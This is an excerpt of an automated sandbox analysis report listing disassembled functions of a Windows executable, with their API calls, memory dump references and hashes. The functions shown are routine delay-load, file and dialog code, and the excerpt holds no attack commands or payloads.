                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b6af567acd30339c259eaab2d5594f8893139c0fb6a739c5cb18bc77e48814b4
                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                            • Opcode Fuzzy Hash: b6af567acd30339c259eaab2d5594f8893139c0fb6a739c5cb18bc77e48814b4
                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                            Function 00CDE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5566987519b71ef7e774841d93a8c1c6646147044e8beeac51355f7f0b77709b
                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                            • Opcode Fuzzy Hash: 5566987519b71ef7e774841d93a8c1c6646147044e8beeac51355f7f0b77709b
                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                            Function 00CDE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0ce9e03acd2583b185641c2a54a4d00dc50c68018bfb738a5e05145523d0ecd2
                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                            • Opcode Fuzzy Hash: 0ce9e03acd2583b185641c2a54a4d00dc50c68018bfb738a5e05145523d0ecd2
                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                            Function 00CDE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0d08c898f319bc5651ef4db13299a43d7ebecb1467a9303be3b73c563d119de6
                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                            • Opcode Fuzzy Hash: 0d08c898f319bc5651ef4db13299a43d7ebecb1467a9303be3b73c563d119de6
                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                            Function 00CDE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b693e4d475864cc74b716d8693bc2985ae86db523dafb35ec95bc33c07f5a160
                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                            • Opcode Fuzzy Hash: b693e4d475864cc74b716d8693bc2985ae86db523dafb35ec95bc33c07f5a160
                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                            Function 00CDE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1b274f8cd3f9d2a607d58651f3c5542a9002eeb84f3f71a852d07ed7906640b8
                                                            • Instruction ID: 193db1a61880c5c030977c10d5db240c3490fb630d45c57191d75820dfea41e9
                                                            • Opcode Fuzzy Hash: 1b274f8cd3f9d2a607d58651f3c5542a9002eeb84f3f71a852d07ed7906640b8
                                                            • Instruction Fuzzy Hash: F6A002D565D1557C314471566D46C37011DC4C5B55331556FF615C95C1784018556471
                                                            Function 00CDE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: adcb99dfc991f71df1ae2791909b4f193acffcfc4cf7fd555a740dd5212139dc
                                                            • Instruction ID: 193db1a61880c5c030977c10d5db240c3490fb630d45c57191d75820dfea41e9
                                                            • Opcode Fuzzy Hash: adcb99dfc991f71df1ae2791909b4f193acffcfc4cf7fd555a740dd5212139dc
                                                            • Instruction Fuzzy Hash: F6A002D565D1557C314471566D46C37011DC4C5B55331556FF615C95C1784018556471
                                                            Function 00CDE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3dbaaff6afa2cbb29aafd789de013f9d21759909143e5035d05608ec215c2d62
                                                            • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                            • Opcode Fuzzy Hash: 3dbaaff6afa2cbb29aafd789de013f9d21759909143e5035d05608ec215c2d62
                                                            • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                            Function 00CDE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7c78d723a8bd3918b72f3d0f59feca77159121e044cce37c56d5e83538066ef1
                                                            • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                            • Opcode Fuzzy Hash: 7c78d723a8bd3918b72f3d0f59feca77159121e044cce37c56d5e83538066ef1
                                                            • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                            Function 00CDE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: eb22ee22fe6dad20b1519a43e0cf0d5b72b90a34e09786fd39c9489a37214597
                                                            • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                            • Opcode Fuzzy Hash: eb22ee22fe6dad20b1519a43e0cf0d5b72b90a34e09786fd39c9489a37214597
                                                            • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                            Function 00CDE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9e3452e7403f15d43d7ce7c3167173f3f19810501c363a2e55eb637d354a169c
                                                            • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                            • Opcode Fuzzy Hash: 9e3452e7403f15d43d7ce7c3167173f3f19810501c363a2e55eb637d354a169c
                                                            • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                            Function 00CDE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 660f5bf91a88677a87905fe960a9c62afe201a4632cd29bb22dcd2654adcbec3
                                                            • Instruction ID: 42add9c61b296add59a1348830954788e19fa5e51da7a8f458f030caa9ad4914
                                                            • Opcode Fuzzy Hash: 660f5bf91a88677a87905fe960a9c62afe201a4632cd29bb22dcd2654adcbec3
                                                            • Instruction Fuzzy Hash: 63A011C22A80883C3008B2A22E82C3B022CC8C0B2A330822FFA00C82C0B88008002832
                                                            Function 00CC9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,00CC903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CC9F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: 213ecbf179ae96e554054b617548102978a48f65569dcbac4b993f0a496b7d29
                                                            • Instruction ID: b71d1c34e2aa4a9568177139f87d60ad5b95fbd3556761eb7e23fef4d78663a9
                                                            • Opcode Fuzzy Hash: 213ecbf179ae96e554054b617548102978a48f65569dcbac4b993f0a496b7d29
                                                            • Instruction Fuzzy Hash: 46A0223008000E8BCE802B30CE0832C3B20FB20BC030002E8A00BCF0B2CF23880BCB22
                                                            Function 00CDAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,00CDAE72,C:\Users\user\Desktop,00000000,00D0946A,00000006), ref: 00CDAC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: 3abf8698f24b160306dbfa8825a6738f30d59f68449f0b26a1f93a215c6d046a
                                                            • Instruction ID: 7047a7c49c397a36f661c657ce57c610b61bf05168a7205450f4a010cefadb91
                                                            • Opcode Fuzzy Hash: 3abf8698f24b160306dbfa8825a6738f30d59f68449f0b26a1f93a215c6d046a
                                                            • Instruction Fuzzy Hash: 2EA01130200280AB82000B328F0AB0EBAAAAFA2B00F00C028A00088030CB30C820EA02

                                                            Non-executed Functions

                                                            Function 00CDC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CDC2B1
                                                            • EndDialog.USER32(?,00000006), ref: 00CDC2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 00CDC2E0
                                                            • SetFocus.USER32(00000000), ref: 00CDC2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CDC321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CDC358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00CDC36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDC38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC3D4
                                                            • _swprintf.LIBCMT ref: 00CDC404
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CDC417
                                                            • FindClose.KERNEL32(00000000), ref: 00CDC41E
                                                            • _swprintf.LIBCMT ref: 00CDC477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CDC48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CDC4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CDC4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC509
                                                            • _swprintf.LIBCMT ref: 00CDC535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CDC548
                                                            • _swprintf.LIBCMT ref: 00CDC59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CDC5AF
                                                              • Part of subcall function 00CDAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                              • Part of subcall function 00CDAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CFE72C,?,?), ref: 00CDAF84
